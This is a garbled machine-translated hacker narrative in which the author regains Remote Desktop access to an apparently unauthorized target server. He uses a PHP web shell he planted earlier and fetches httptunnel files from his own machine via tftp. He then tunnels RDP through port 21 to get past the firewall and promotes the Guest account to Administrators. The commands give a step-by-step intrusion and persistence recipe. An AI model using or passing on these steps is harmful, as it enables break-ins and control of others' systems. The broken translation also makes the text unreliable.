From:http://www. oioj. net/ my home ISP a free personal home page service, in the days that followed, I often passed 3 3 8 9 Port to log in, constantly to the IT patch patch the vulnerability, do some management and maintenance, own also grow a lot of knowledge. Recently delving intonetworksecurity technology, I again come up with Windows 2 0 0 0 Terminal Services client, want to get on that Station services Controller, the results prompted: the client cannot connect to Terminal Server. The server may be too busy, Please and then later re-connected. Tried several times are not connected, hastens with the Scan Tool the scan a bit, and found that the server actually only open the 2 1, and 8 0 two ports, what is it? Administrators change the system configuration? See if I put thePHP Web Shell is still not in, which I previously placed in service on the controller, is System permissions. open http://cn.*. com/door/scripts/info.php my horse is still alive. It makes me very happy, the administrator should not reinstall the system. In thePHP Web Shell command box, enter netstat-an, the point after the execution, the output so of a: TCP 0.0.0.0:3 3 8 9 0.0.0.0:0 LISTENING describes the Terminal Service and is not turned off, only firewall external shield 3 3 8 9 port. The administrator becomes smart, and this little obstacle how can stump in the Black guest camp veteran of many years of insect worm? Since you open the 2 1, and 8 0 two ports, I have 8 0 port the System permissions of the back door, let's here from the start, through the TCP hidden passage! TCP hidden channel TCP Tunnel is a bypass firewall ports shielded communication method,in the Local the firewall is prohibited by the data encapsulated in the firewall are allowed through the packet type or port, and then through the firewall and to the end of the communication, when the encapsulated packet reaches the destination, then the packet is restored, and the restored packet is delivered to the corresponding service. To achieve TCP hidden channel technology tools now there are many, I use the Httptunnelforwin it. In my machine running on the HTC client: htc-F 3 3 8 9 cn.. com:2 1, so that sent me the machine 3 3 8 9 port the data will go through HTC of the package after processing, sent to the cn.**. com 2 1 port. ByPHP Web Shell command: tftp-I myip get [file], Httptunnel server program of hts. exe and the required cygwin1. dll two files to upload to the server. Then run the Httptunnel server, the command is as follows: hts-F localhost:3 3 8 9 2 1,So from 2 to 1 port data coming through the hts solution after treatment, forwarded to the local 3 3 8 9 port. I here the reason for using 2 1 The port without the use of 8 0 of the port, because I have a Web Shell, if 2 1 port out of the question, I may be in the Shell Kill off the process! And use 8 0 port, in case of unexpected error, I can't handle. Well, the use ofPHP Web Shell to activate the Guest account added to the Administrators group. In Windows 2 0 0 0 Terminal Services client to fill in the server address, and the like than it used to be a little longer time, finally appeared the Telnet interface! On connecting, I can be like using your own machine as easy to use Server!